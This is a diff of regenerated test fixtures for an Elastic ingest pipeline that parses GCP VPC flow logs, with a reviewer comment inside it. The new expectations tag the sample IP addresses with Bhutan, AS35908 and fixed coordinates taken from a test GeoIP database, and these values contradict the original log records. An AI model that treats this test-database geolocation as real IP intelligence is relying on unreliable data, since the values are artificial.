03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", @@ -8658,11 +9072,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33968, 
@@ -8734,7 +9153,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391630400Z", + "ingested": "2021-12-14T14:43:27.415219084Z", "original": "{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", @@ -8756,11 +9175,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33590, 
@@ -8832,7 +9256,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391635900Z", + "ingested": "2021-12-14T14:43:27.415219585Z", "original": "{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", @@ -8854,11 +9278,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -8930,7 +9359,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391641300Z", + "ingested": "2021-12-14T14:43:27.415220055Z", "original": "{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -8946,11 +9375,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33690, 
@@ -9028,7 +9462,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391646800Z", + "ingested": "2021-12-14T14:43:27.415220465Z", "original": "{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", @@ -9050,11 +9484,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33874, 
@@ -9126,7 +9565,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391652400Z", + "ingested": "2021-12-14T14:43:27.415220862Z", "original": "{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", @@ -9142,11 +9581,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33572, 
@@ -9224,7 +9668,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391657800Z", + "ingested": "2021-12-14T14:43:27.415221251Z", "original": "{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", @@ -9240,11 +9684,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33968, 
@@ -9322,7 +9771,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391663200Z", + "ingested": "2021-12-14T14:43:27.415221641Z", "original": "{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", @@ -9344,11 +9793,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33880, 
@@ -9420,7 +9874,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391668700Z", + "ingested": "2021-12-14T14:43:27.415222043Z", "original": "{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", 
@@ -9431,16 +9885,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.453Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 57300, 
@@ -9454,6 +9943,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415222489Z", + "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:22.044604322Z", + "end": "2019-06-14T03:48:22.156322353Z", + "id": "y4wffpfk2erox", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -9465,25 +9964,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -9494,23 +9992,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 210 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391674600Z", - "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:22.044604322Z", - "end": "2019-06-14T03:48:22.156322353Z", - "id": "y4wffpfk2erox", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -9519,13 +10008,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65315, 
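Review bot: The regenerated expectation for insertId y4wffpfk2eroc drops the provider-supplied `"city_name": "Broomfield"` / `"region_name": "Colorado"` and AS 33652 for 67.43.156.13 and replaces them with the Bhutan / lat 27.5, lon 90.5 / AS 35908 values that the test GeoIP database bundled with elastic-package appears to return for that range, so `source.geo` and `source.as` no longer agree with the `src_location` block inside `event.original`. If the pipeline is now meant to let the local geoip/asn lookup overwrite the location Google attaches to the flow record, that is a fidelity loss for investigators (the city/region survives only as text inside event.original) and deserves an explicit statement in the changelog or pipeline description; if it is not intended, the geoip processors should only fill fields the log did not already provide, e.g. `"if": "ctx.source?.geo == null"`. Either way these fixtures now encode test-database values rather than anything a production GeoIP lookup would produce, which is worth a one-line comment in the test README so nobody treats Bhutan/AS35908 as real enrichment. The ingest pipeline change itself is not visible in this diff, so which of the two behaviours is intended should be confirmed against it.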
@@ -9533,50 +10025,8 @@ "ip": "67.43.156.13", "packets": 728 }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", - "bytes": 71014, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 728, - "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:16.453Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.139.99.242" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 210 - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.391680200Z", + "ingested": "2021-12-14T14:43:27.415222887Z", "original": "{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:
50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", @@ -9584,6 +10034,18 @@ "id": "y4wffpfk2eroc", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", + "bytes": 71014, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 728, + "direction": "inbound" } }, { @@ -9592,11 +10054,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -9674,7 +10141,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391685700Z", + "ingested": "2021-12-14T14:43:27.415223329Z", "original": "{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -9690,11 +10157,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33880, 
@@ -9772,7 +10244,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391691100Z", + "ingested": "2021-12-14T14:43:27.415223715Z", "original": "{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", @@ -9794,11 +10266,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
